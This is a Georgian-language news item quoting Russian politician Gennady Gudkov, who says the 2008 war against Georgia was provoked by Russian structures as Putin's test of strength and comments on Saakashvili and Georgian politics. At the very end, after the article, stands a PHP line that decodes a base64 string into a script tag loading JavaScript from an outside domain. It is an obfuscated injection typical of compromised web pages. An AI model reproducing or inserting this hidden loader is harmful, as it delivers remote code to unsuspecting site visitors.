celsiusi
ავერსი შნაიდერი
მაშინ ეს ომი  რუსული სტრუქტურების მიერ მზადდებოდა   და მათ მიერ იყო პროვოცირებული. სამწუხაროდ საქართველომ  ამ პროვოკაციებზე მოახდინა რეაგირება – ამბობს რუსი პოლიტიკოსი და ბიზნესმენი გენადი გუდკოვი რადიო "მაესტროსთან" ინტერვიუში. 
 
მისივე თქმით, რაც მაშინ მოხდა, ეს იყო ძალების მოსინჯვა. 
 
"ეს იყო პროვოცირებული ომი. მაშინ ეს ომი  რუსული სტრუქტურების მიერ მზადდებოდა   და მათ მიერ იყო პროვოცირებული. სამწუხაროდ საქართველომ  ამ პროვოკაციებზე მოახდინა რეაგირება. რაც მაშინ მოხდა, ეს იყო ძალების მოსინჯვა. მაშინ შეიძლება, კარგად არ გვესმოდა რასთან გვქონდა საქმე, მაგრამ დღეს ნათლად ჩანს რომ ეს იყო ძალების მოსინჯვის პირველი მცდელობა. ანუ, ეს იყო პუტინის გზა ახალი იმპერიის შესაქმნელად. საბედნიეროდ, მაშინ პუტინის გაჩერება მოხერხდა, ეს კი მოხდა გარკვეულ პოლიტიკურ დონეზე, მაშინ სამხედრო წინააღმდეგობა დიდი არ ყოფილა. პუტინმა არ გარისკა საერთაშორისო საზოგადოების წინააღმდეგ წასულიყო. მან, მაშინ,უარი თქვა  საქართველოს სრულიად ოკუპაციაზე. საერთაშორისო საზოგადოების ფაქტორმა უმნიშვნელოვანესი როლი ითამაშა საქართველოში დემოკრატიის და თავისუფლლების შესანარჩუნებლად, მე იმედი მაქვს, რომ დღესაც  საქართველო წარმოადგენს  დემოკრატიულ და თავისუფალ ქვეყანას. გარკვეული ეჭვები არსებობს იმისა, რომ დღეს ეს ასე არაა, იმ პროცესებიდან გამომდინარე, რაც დღეს მიდის თქვენს ქვეყანაში. პროსესები რომელიც მიმდინარეობს არაერთგვაროვანია, ვერაფრით გამიგია სააკაშვილთან მიმდინარე შიდა დაპირისპირება, რომ არა სააკაშვილი, დღეს საქართველოში ბევრი  კარგი რამ  არ იქნებოდა. რა თქმა უნდა, ეს ჩემი პირადი მოსაზრებაა, შეიძლება ვცდებოდე, მე არცერთხელ არ შევხვედრილვარ სააკაშვილს. უბრალოდ ვაფასებ შორიდან.
 
 
684
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");